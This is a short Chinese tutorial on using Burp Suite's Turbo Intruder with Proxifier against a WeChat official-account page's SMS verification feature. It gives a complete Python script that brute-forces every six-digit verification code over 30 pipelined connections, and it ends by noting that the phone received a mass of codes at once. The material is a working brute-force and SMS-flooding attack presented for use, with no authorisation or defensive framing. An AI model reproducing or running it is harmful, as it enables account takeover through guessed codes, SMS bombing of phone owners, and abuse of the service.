在burpsuite中安装turbo-intruder
1、打开burpsuite在bpstore中直接下载安装:
burpsuite和Proxifier联动
1、打开Proxifier配置代理后联动burpsuite使用:
2、打开微信公众号找到可以发送验证码页面,输入电话号码后抓包:
3、在数据包处右键turbo-intruder插件进行高并发爆破:
在Host下方输入:x-req: %s
在下方写入代码:
from itertools import product
def brute_veify_code(target, engine, length):
pattern = '1234567890'
for i in list(product(pattern, repeat=length)):
code = ''.join(i)
engine.queue(target.req, code)def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=30,
requestsPerConnection=100,
pipeline=True
)
brute_veify_code(target, engine, 6)def handleResponse(req, interesting):
# currently available attributes are req.status, req.wordcount, req.length and req.response
if 'error' not in req.response:
table.add(req)
4、点击Attack开始攻击:
5、插件启动成功,关闭拦截,到手机验证,发现同一时间收到大量验证码: